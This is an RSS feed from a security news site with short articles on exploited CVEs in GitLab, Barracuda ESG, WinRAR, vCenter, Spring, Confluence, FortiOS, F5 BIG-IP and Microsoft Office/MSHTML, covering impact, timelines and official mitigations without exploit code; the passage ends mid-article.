<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>0dayNews</title><description>Independent coverage of CVEs, KEV catalog additions, and breach news.</description><link>https://0daynews.com/</link><language>en-us</language><item><title>GitLab&apos;s ExifTool RCE: A Patch That Sat Unrecognized for Months</title><link>https://0daynews.com/articles/2026-07-06-gitlab-exiftool-rce-cve-2021-22205/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-06-gitlab-exiftool-rce-cve-2021-22205/</guid><description>CVE-2021-22205 was quietly fixed in April 2021 — but its full unauthenticated remote-code-execution severity wasn&apos;t widely understood until late 2021, by which point mass exploitation had already begun.</description><pubDate>Mon, 06 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;A patch existing and a patch being applied are two different things — and the gap between them is exactly what made &lt;a href=&quot;/cve/cve-2021-22205/&quot;&gt;CVE-2021-22205&lt;/a&gt; dangerous months after GitLab had already fixed it.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw is a remote-code-execution vulnerability in GitLab Community Edition and Enterprise Edition, in how the platform handles certain uploaded image files. A crafted image, processed through a vulnerable version of the bundled ExifTool metadata-parsing library, could trigger arbitrary code execution on the GitLab server — reachable by any unauthenticated user able to reach an image-upload endpoint, no login required.&lt;/p&gt;
&lt;h2&gt;Why the timeline matters&lt;/h2&gt;
&lt;p&gt;GitLab originally patched the underlying issue in April 2021. But the security community&apos;s initial understanding of the bug&apos;s severity didn&apos;t match reality: the original patch notes didn&apos;t clearly convey that this was full pre-authentication remote code execution, and the vulnerability didn&apos;t attract the urgent, wide-scale patching response a bug of that severity should have. It took researchers re-analyzing the fix months later, in late 2021, to demonstrate the complete unauthenticated exploitation path publicly — and once that happened, exploitation moved fast.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;GitLab instances host an organization&apos;s source code repositories, CI/CD pipeline configuration, and frequently embedded deployment secrets and API credentials — a compromise here rarely stays contained to &quot;just&quot; the Git server. Once public proof-of-concept exploit code circulated in late 2021, mass scanning of internet-exposed GitLab instances began, with attackers using compromised servers for cryptomining and, in some cases, further network pivoting using credentials found in repositories.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;CISA added the CVE to its KEV catalog in late 2021, months after GitLab&apos;s original patch, once active mass exploitation was confirmed — a useful case study in why patch &lt;em&gt;availability&lt;/em&gt; and patch &lt;em&gt;adoption&lt;/em&gt; need to be tracked separately, and why security teams should treat &quot;patched months ago&quot; as no guarantee that every instance actually got the update. Organizations still running unpatched GitLab versions were urged to update immediately and to review logs for signs of prior exploitation. Full technical detail and patch guidance are in &lt;a href=&quot;https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/&quot;&gt;GitLab&apos;s security release notes&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-22205&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-06-gitlab-exiftool-rce-cve-2021-22205/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2021-22205</category><category>GitLab</category><category>ExifTool</category><category>remote code execution</category><category>patch adoption gap</category></item><item><title>Barracuda Told Customers to Replace Their Appliances, Not Just Patch Them. Here&apos;s Why.</title><link>https://0daynews.com/articles/2026-07-05-barracuda-esg-zero-day-cve-2023-2868/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-05-barracuda-esg-zero-day-cve-2023-2868/</guid><description>CVE-2023-2868 was exploited as a zero-day for roughly seven months before discovery — and left some compromised appliances backdoored even after the software patch was applied.</description><pubDate>Sun, 05 Jul 2026 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;Most vulnerability disclosures end with &quot;apply the patch.&quot; &lt;a href=&quot;/cve/cve-2023-2868/&quot;&gt;CVE-2023-2868&lt;/a&gt; ended with something far more unusual: Barracuda telling a subset of customers to physically replace their appliances, because a software patch alone wouldn&apos;t remove what attackers had already planted.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw is a remote command-injection vulnerability in Barracuda Networks&apos; Email Security Gateway (ESG) appliances, rooted in incomplete input validation in a module responsible for screening email attachments. Barracuda disclosed the issue on May 23, 2023 — but the investigation that followed the disclosure revealed something more troubling: the vulnerability had been actively exploited as a zero-day since at least October 2022, roughly seven months of undetected exploitation against a subset of ESG appliances before anyone noticed.&lt;/p&gt;
&lt;h2&gt;Why patching wasn&apos;t enough&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;This is the detail that sets CVE-2023-2868 apart from most perimeter-device CVEs.&lt;/strong&gt; The attackers who exploited the flaw during that seven-month window didn&apos;t just gain temporary access — they deployed custom malware built specifically for persistence and ongoing data exfiltration. Barracuda&apos;s forensic investigation found that on some compromised appliances, that malware persisted even after the software patch was applied, because the patch fixed the injection vulnerability but didn&apos;t remove an implant that had already established its own foothold on the device.&lt;/p&gt;
&lt;p&gt;That finding drove Barracuda&apos;s unusual remediation call: rather than trust a software fix to fully clean a potentially compromised unit, the company told affected customers to physically replace compromised ESG appliances outright — a step rarely recommended outside of firmware-level implant scenarios, and a signal of how seriously Barracuda treated the risk of residual access.&lt;/p&gt;
&lt;h2&gt;Who was behind it&lt;/h2&gt;
&lt;p&gt;CISA and threat intelligence researchers linked the campaign to a China-nexus espionage actor, and the targeting pattern reinforced that assessment: a relatively small, apparently selective number of government and high-value organizational targets, rather than the indiscriminate mass-scanning pattern typical of most KEV-catalog perimeter-device bugs.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Organizations running affected ESG appliances were directed to Barracuda&apos;s investigation findings to determine compromise status and, where indicators of compromise were present, to replace the physical appliance rather than rely on the patch alone. Full detail on the incident and remediation guidance is in &lt;a href=&quot;https://www.barracuda.com/company/legal/esg-vulnerability&quot;&gt;Barracuda&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-2868&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-05-barracuda-esg-zero-day-cve-2023-2868/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2023-2868</category><category>Barracuda ESG</category><category>Email Security Gateway</category><category>appliance replacement</category><category>persistent backdoor</category></item><item><title>The WinRAR Bug That Hid a Malicious Script Behind a Fake Photo</title><link>https://0daynews.com/articles/2026-07-05-winrar-path-traversal-cve-2023-38831/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-05-winrar-path-traversal-cve-2023-38831/</guid><description>CVE-2023-38831 let a booby-trapped archive execute code when a user clicked what looked like a harmless image file — exploited against trading forums before the technical details were widely known.</description><pubDate>Sun, 05 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;WinRAR sits on hundreds of millions of Windows machines, many with automatic update prompts routinely clicked away — exactly the slow-patching install base &lt;a href=&quot;/cve/cve-2023-38831/&quot;&gt;CVE-2023-38831&lt;/a&gt; was suited to exploit.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw involves how WinRAR handles a specific kind of crafted archive: one built so that a decoy folder shares a name with what appears to be a harmless file inside — a &lt;code&gt;.jpg&lt;/code&gt;, for instance. When a user double-clicked the seemingly innocuous file in WinRAR&apos;s preview to view it, the naming trick caused a hidden malicious script to execute instead of the expected image viewer opening the photo. RARLAB shipped a fix in WinRAR 6.23, released August 2, 2023, with the vulnerability formally disclosed and cataloged on August 23, 2023.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Security researchers found evidence that this technique was already being used in the wild — in campaigns targeting cryptocurrency and stock-trading forums — before the technical details were widely publicized, with malicious archives disguised as trading tools, account statements, or investment documents distributed to forum users. WinRAR&apos;s massive, slow-to-update install base (the application has no built-in auto-update mechanism by default) made it an attractive, durable vector: a single crafted archive could remain effective against unpatched installs for a long time after the fix shipped.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Because WinRAR doesn&apos;t auto-update, the core remediation guidance emphasized manual action: users and administrators need to actively download and install version 6.23 or later rather than wait for a prompt. CISA added the CVE to its KEV catalog given confirmed active exploitation. Organizations distributing WinRAR internally via software management tools were advised to push the update explicitly rather than rely on end users to do so. Full technical detail is in &lt;a href=&quot;https://www.rarlab.com/rarnew.htm&quot;&gt;RARLAB&apos;s release notes&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-38831&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-05-winrar-path-traversal-cve-2023-38831/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2023-38831</category><category>WinRAR</category><category>RARLAB</category><category>path traversal</category><category>spoofed file extension</category></item><item><title>vCenter&apos;s Unrestricted-Upload Bug: A Reminder That Management Planes Shouldn&apos;t Face the Internet</title><link>https://0daynews.com/articles/2026-07-04-vmware-vcenter-vsphere-client-rce-cve-2021-21972/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-04-vmware-vcenter-vsphere-client-rce-cve-2021-21972/</guid><description>CVE-2021-21972 let unauthenticated attackers execute code with root privileges on VMware vCenter Server — and internet scans found tens of thousands of instances exposed anyway, against VMware&apos;s own guidance.</description><pubDate>Sat, 04 Jul 2026 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;VMware has said for years that vCenter Server should never be directly reachable from the internet. &lt;a href=&quot;/cve/cve-2021-21972/&quot;&gt;CVE-2021-21972&lt;/a&gt; showed how many organizations ignored that guidance — and what it cost them when a maximum-impact bug arrived.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw sits in a plugin exposed through the vSphere Client (HTML5), part of vCenter Server&apos;s management interface. Any unauthenticated attacker with network access to vCenter&apos;s HTTPS port could upload a specially crafted file and use it to execute arbitrary commands with unrestricted privileges — effectively root or SYSTEM-equivalent access to the underlying host operating system. VMware disclosed the flaw on February 23, 2021, with a CVSS score of 9.8, reflecting both the lack of any access requirement and the severity of the resulting compromise.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;vCenter Server is the central management plane for VMware vSphere virtualization environments — the console that controls every virtual machine, physical host, and datastore in the environment it manages. A vCenter compromise isn&apos;t contained to one system; it&apos;s a path to control over an organization&apos;s entire virtualized infrastructure. Within days of VMware&apos;s advisory, researchers published working exploit code, and internet-wide scanning found tens of thousands of vCenter instances directly reachable from the public internet — a configuration VMware had explicitly warned against in its own deployment documentation for years. Mass exploitation and opportunistic scanning followed almost immediately once exploit code was public.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;VMware&apos;s guidance was direct: patch immediately, and at minimum ensure the vCenter management interface is isolated from the internet on an internal, access-controlled network — not exposed directly, regardless of patch status. The vulnerability was added to CISA&apos;s KEV catalog. Full technical detail and patch availability are in &lt;a href=&quot;https://www.vmware.com/security/advisories/VMSA-2021-0002.html&quot;&gt;VMware&apos;s security advisory (VMSA-2021-0002)&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-21972&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-04-vmware-vcenter-vsphere-client-rce-cve-2021-21972/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2021-21972</category><category>VMware vCenter Server</category><category>vSphere Client</category><category>unrestricted file upload</category><category>virtualization security</category></item><item><title>Spring4Shell: Why This One Needed Careful Triage, Not Panic</title><link>https://0daynews.com/articles/2026-07-04-spring4shell-vmware-spring-framework-rce/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-04-spring4shell-vmware-spring-framework-rce/</guid><description>CVE-2022-22965 leaked publicly before VMware&apos;s patch was ready — but unlike Log4Shell, exploitation required a specific combination of conditions that made blanket panic the wrong response.</description><pubDate>Sat, 04 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;The name was almost designed to cause panic: &quot;Spring4Shell,&quot; disclosed barely four months after Log4Shell, in a framework nearly as widely deployed. &lt;a href=&quot;/cve/cve-2022-22965/&quot;&gt;CVE-2022-22965&lt;/a&gt; turned out to be serious — but not universally exploitable in the way its namesake suggested, and the distinction mattered for how security teams should have responded.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The Spring Framework, the widely used Java application framework stewarded by VMware, contains a data-binding process that — under a specific set of conditions — could be manipulated by a remote attacker to reach the underlying ClassLoader and ultimately write a malicious file to a web-accessible path, achieving remote code execution. VMware confirmed the flaw on March 31, 2022, the same day proof-of-concept exploit details leaked publicly ahead of the official patch, forcing an accelerated release.&lt;/p&gt;
&lt;h2&gt;The conditions that mattered&lt;/h2&gt;
&lt;p&gt;Unlike Log4Shell&apos;s near-universal applicability, Spring4Shell required a specific combination: JDK 9 or later, Spring MVC or Spring WebFlux, and — critically — deployment as a traditional WAR file on Apache Tomcat rather than the increasingly common embedded-server or Spring Boot executable-JAR deployment model many newer applications use. Applications outside that combination weren&apos;t vulnerable to this specific CVE, even though they still used Spring.&lt;/p&gt;
&lt;h2&gt;Why the distinction mattered&lt;/h2&gt;
&lt;p&gt;In the first 48 hours, confusion was widespread — some teams treated it as Log4Shell-scale, others dismissed it prematurely. Both reactions carried risk: overreacting wastes scarce incident-response capacity that might be needed elsewhere, while underreacting leaves genuinely vulnerable applications exposed. VMware&apos;s advisory functioned as much as risk-triage guidance as a patch notice, spelling out exactly which deployment configurations were affected so security teams could prioritize accurately rather than guess.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Apply VMware&apos;s and Spring&apos;s patched framework versions regardless of the specific deployment model, since the underlying data-binding issue was fixed framework-wide — but prioritize incident response and forensic review specifically for applications matching the vulnerable configuration. CISA added the CVE to its KEV catalog following confirmed in-the-wild exploitation. Full technical detail and the complete list of vulnerable configurations are in &lt;a href=&quot;https://tanzu.vmware.com/security/cve-2022-22965&quot;&gt;VMware&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-22965&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-04-spring4shell-vmware-spring-framework-rce/cover.jpg" medium="image" width="1200" height="675"/><category>Spring4Shell</category><category>CVE-2022-22965</category><category>Spring Framework</category><category>VMware</category><category>data binding</category></item><item><title>The Confluence Bug That Went From Zero-Day to Mass Ransomware Precursor in Days</title><link>https://0daynews.com/articles/2026-07-03-confluence-ognl-injection-cve-2022-26134/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-03-confluence-ognl-injection-cve-2022-26134/</guid><description>CVE-2022-26134 gave unauthenticated attackers remote code execution on any exposed Confluence instance — and became a go-to foothold for ransomware operators within days of disclosure.</description><pubDate>Fri, 03 Jul 2026 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;Documentation platforms rarely make headlines the way perimeter firewalls do — until a bug like &lt;a href=&quot;/cve/cve-2022-26134/&quot;&gt;CVE-2022-26134&lt;/a&gt; turns one into an unauthenticated remote-code-execution target overnight.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw is an OGNL (Object-Graph Navigation Language) injection vulnerability in Atlassian Confluence Server and Data Center. Specially crafted input reaching a vulnerable endpoint would be evaluated as an OGNL expression rather than treated as inert data — and OGNL expressions in Confluence&apos;s context can execute arbitrary code on the underlying server. No authentication was required at any step. Atlassian disclosed the bug on June 2, 2022, after its own security team, working with an incident responder, discovered it was already being exploited as a zero-day.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Confluence is where an organization&apos;s institutional knowledge tends to accumulate — architecture diagrams, internal network documentation, and, not infrequently, credentials or API keys pasted into a wiki page by someone who meant to remove them later. That combination — sensitive documentation plus a foothold into the internal network — makes Confluence a favorite precursor target for ransomware operators, not just an isolated data-exposure risk. Within days of disclosure, mass internet scanning began, with attackers deploying webshells and cryptomining payloads against any Confluence instance left unpatched and internet-exposed.&lt;/p&gt;
&lt;h2&gt;Atlassian&apos;s response&lt;/h2&gt;
&lt;p&gt;Atlassian shipped emergency patches within roughly 48 hours of public disclosure — an unusually fast turnaround reflecting the severity — and published interim mitigation steps, including a temporary workaround and WAF rule, for organizations that couldn&apos;t patch immediately. CISA added the CVE to its KEV catalog.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Patch to a fixed Confluence version immediately; where immediate patching isn&apos;t possible, apply Atlassian&apos;s documented interim mitigation and restrict internet exposure of the instance in the meantime. Full technical detail and patch availability are in &lt;a href=&quot;https://confluence.atlassian.com/security/cve-2022-26134-1233684593.html&quot;&gt;Atlassian&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-26134&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-03-confluence-ognl-injection-cve-2022-26134/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2022-26134</category><category>Atlassian Confluence</category><category>OGNL injection</category><category>ransomware precursor</category><category>webshell</category></item><item><title>FortiOS Auth Bypass: Why Fortinet Warned Select Customers Before Going Public</title><link>https://0daynews.com/articles/2026-07-03-fortios-fortiproxy-auth-bypass-cve-2022-40684/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-03-fortios-fortiproxy-auth-bypass-cve-2022-40684/</guid><description>CVE-2022-40684 let attackers bypass authentication on FortiOS and FortiProxy management interfaces and plant persistent SSH keys — Fortinet quietly warned targeted customers before public disclosure.</description><pubDate>Fri, 03 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Vendors usually disclose a vulnerability to everyone at once. When Fortinet found evidence &lt;a href=&quot;/cve/cve-2022-40684/&quot;&gt;CVE-2022-40684&lt;/a&gt; was already being exploited against specific customers, it broke from that pattern — quietly warning a targeted subset before the public advisory went out on October 10, 2022.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw is an authentication bypass affecting the administrative interface of FortiOS, FortiProxy, and FortiSwitchManager. By sending specially crafted requests to the management interface, an unauthenticated remote attacker could perform administrative actions without valid credentials. The most consequential of those actions: adding a new SSH public key to an administrative account, giving the attacker persistent access that would survive a subsequent password reset — since the key, not a password, is what grants access.&lt;/p&gt;
&lt;h2&gt;Why the private warning mattered&lt;/h2&gt;
&lt;p&gt;Fortinet&apos;s decision to privately notify select customers ahead of the public disclosure reflected genuine urgency: the company had evidence of active, apparently targeted exploitation before the advisory went public, and wanted at-risk customers patched before attackers could act on the now-public technical details. It&apos;s an unusual step for a vendor and a signal, in hindsight, of how seriously Fortinet treated the in-the-wild activity.&lt;/p&gt;
&lt;h2&gt;Why it mattered broadly&lt;/h2&gt;
&lt;p&gt;FortiGate firewalls and FortiProxy appliances are perimeter devices — the boundary between an organization&apos;s internal network and the internet, and often the VPN gateway for remote access as well. A management-plane compromise here is a foothold for deeper intrusion, not just a device-level problem. Because attackers could plant SSH keys for persistence, Fortinet&apos;s remediation guidance went further than &quot;apply the patch&quot;: administrators were told to audit for unauthorized admin accounts and unrecognized SSH keys on any potentially exposed device, treating exposure as presumed compromise rather than assuming a clean patch fixed everything.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Apply Fortinet&apos;s patched FortiOS/FortiProxy releases, restrict management-interface access to trusted networks, and audit administrative accounts and SSH keys for anything unrecognized — patching alone does not remove a key an attacker already planted. CISA added the CVE to its KEV catalog with an expedited deadline. Full technical detail is in Fortinet&apos;s PSIRT advisory (FG-IR-22-377) and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-40684&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-03-fortios-fortiproxy-auth-bypass-cve-2022-40684/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2022-40684</category><category>FortiOS</category><category>FortiProxy</category><category>authentication bypass</category><category>SSH key persistence</category></item><item><title>F5 BIG-IP&apos;s Maximum-Severity Auth Bypass: What CVE-2022-1388 Actually Exposed</title><link>https://0daynews.com/articles/2026-07-02-f5-big-ip-icontrol-rest-auth-bypass/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-02-f5-big-ip-icontrol-rest-auth-bypass/</guid><description>A critical authentication-bypass flaw in F5 BIG-IP&apos;s iControl REST API let unauthenticated attackers execute system commands on appliances that front an enormous share of enterprise application traffic.</description><pubDate>Thu, 02 Jul 2026 15:00:00 GMT</pubDate><content:encoded>&lt;p&gt;An application-delivery controller sits between the internet and every application it fronts — which is exactly why &lt;a href=&quot;/cve/cve-2022-1388/&quot;&gt;CVE-2022-1388&lt;/a&gt;, a maximum-severity flaw in F5&apos;s BIG-IP management API, drew mass scanning activity within days of disclosure.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The bug lives in BIG-IP&apos;s iControl REST API, the interface administrators use to configure and manage the appliance. By sending specially crafted HTTP requests, an unauthenticated attacker with network access to the management port — or, in some configurations, a self-IP address used for internal traffic — could bypass iControl REST&apos;s authentication entirely and execute arbitrary system commands with full administrative effect: creating or deleting files, disabling services, or taking over the appliance outright. F5 disclosed the flaw on May 4, 2022, with a CVSS score of 9.8.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;BIG-IP appliances load-balance and terminate traffic for the applications behind them at large enterprises and service providers — a compromised appliance threatens everything it fronts, not just itself. Within days of F5&apos;s advisory, security researchers published working proof-of-concept exploit code, and mass internet scanning for exposed, vulnerable BIG-IP management interfaces began almost immediately. Confirmed exploitation followed within roughly a week, consistent with the pattern seen across most perimeter-appliance CVEs disclosed with public PoCs.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;F5&apos;s guidance was direct: patch immediately, and in the meantime restrict network access to the management interface and self-IP addresses to trusted internal networks only — a baseline configuration recommendation that, notably, many affected organizations had not enforced, which is part of why exposure was so widespread. CISA added the CVE to its KEV catalog with an expedited remediation deadline for federal systems. Full technical detail and patch availability are in &lt;a href=&quot;https://my.f5.com/manage/s/article/K23605346&quot;&gt;F5&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-1388&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-02-f5-big-ip-icontrol-rest-auth-bypass/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2022-1388</category><category>F5 BIG-IP</category><category>iControl REST</category><category>authentication bypass</category><category>application delivery controller</category></item><item><title>Follina Explained: The MSDT Bug That Skipped the Macro Warning Entirely</title><link>https://0daynews.com/articles/2026-07-02-follina-msdt-zero-day-explained/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-02-follina-msdt-zero-day-explained/</guid><description>CVE-2022-30190 let a Word document trigger arbitrary code execution through the Windows Support Diagnostic Tool — no macros, and in some configurations no explicit click required beyond opening the file.</description><pubDate>Thu, 02 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;/cve/cve-2022-30190/&quot;&gt;CVE-2022-30190&lt;/a&gt; — known widely by the nickname &quot;Follina&quot; — followed a familiar 2021-2022 pattern almost exactly: a document-based zero-day that bypassed the macro-security defenses organizations had spent years building, exploited in the wild before anyone outside the attacker&apos;s circle knew it existed.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The bug sits in the Windows Support Diagnostic Tool (MSDT), a legitimate Windows troubleshooting utility. A Word document referencing a remote HTML template could invoke the &lt;code&gt;ms-msdt:&lt;/code&gt; URI protocol handler, using it to run arbitrary PowerShell commands — triggered simply by opening the document, and in certain Office configurations even by the document preview pane, without the user clicking anything further.&lt;/p&gt;
&lt;h2&gt;How it was discovered&lt;/h2&gt;
&lt;p&gt;Independent researchers first drew widespread public attention to the technique on May 27, 2022, after spotting a malicious Word document in the wild that used it — a sample apparently already being used operationally before the security research community identified the pattern. Microsoft confirmed and formally disclosed the vulnerability on May 30, 2022, along with confirmation of active exploitation.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Like CVE-2021-40444 the year before, Follina&apos;s exploitation path didn&apos;t require macros — meaning years of &quot;disable macros from the internet&quot; security awareness training didn&apos;t protect against it. The technique was fast to weaponize and easy to replicate once public, and was adopted broadly by both espionage-motivated and financially motivated threat actors within days of the initial public report, well before Microsoft&apos;s official patch shipped in its June 2022 Patch Tuesday release.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s interim guidance — disabling the MSDT URL protocol handler via a documented registry change — was published before the full patch and gave defenders an emergency stopgap. CISA added the CVE to its KEV catalog. Full technical detail and remediation guidance are in &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190&quot;&gt;Microsoft&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-30190&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-02-follina-msdt-zero-day-explained/cover.jpg" medium="image" width="1200" height="675"/><category>Follina</category><category>CVE-2022-30190</category><category>MSDT</category><category>Windows Support Diagnostic Tool</category><category>zero-day</category></item><item><title>The MSHTML Zero-Day That Turned a Word Document Into Full Code Execution</title><link>https://0daynews.com/articles/2026-07-01-mshtml-office-zero-day-cve-2021-40444/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-01-mshtml-office-zero-day-cve-2021-40444/</guid><description>CVE-2021-40444 let attackers execute arbitrary code through a malicious Office document with no macros required — exploited in the wild before Microsoft&apos;s patch existed.</description><pubDate>Wed, 01 Jul 2026 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;For years, &quot;don&apos;t enable macros in an email attachment&quot; was the single most repeated piece of security advice for Office document phishing. &lt;a href=&quot;/cve/cve-2021-40444/&quot;&gt;CVE-2021-40444&lt;/a&gt; didn&apos;t need macros at all.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw lives in MSHTML, the legacy Trident browser-rendering engine that Windows and certain Office components still rely on for specific document-rendering tasks. Microsoft disclosed the bug on September 7, 2021, confirming it was already being exploited in the wild as a zero-day. The attack technique: a malicious Word document referencing a remote HTML template that loaded a specially crafted ActiveX control, achieving remote code execution the moment the document was opened — no macro prompt, no additional user interaction beyond normal document handling in many default configurations.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;The macro-blocking defenses many organizations had spent years deploying — disabling macros from internet-sourced documents by default, training users to recognize the &quot;Enable Content&quot; prompt as a red flag — didn&apos;t apply here, because the exploit chain never touched macros. That made it an attractive vector for phishing campaigns during the roughly two-week window between public disclosure and Microsoft&apos;s full tested patch, a gap threat intelligence researchers observed being used by multiple actors to deliver commodity malware loaders.&lt;/p&gt;
&lt;h2&gt;Microsoft&apos;s interim mitigation&lt;/h2&gt;
&lt;p&gt;Before the complete patch was ready, Microsoft published a stopgap: disabling ActiveX control installation in Internet Explorer via a registry change, since MSHTML&apos;s vulnerable rendering path was shared infrastructure underneath Office&apos;s own document handling. Security teams widely adopted the workaround as an emergency measure while waiting for the full fix.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
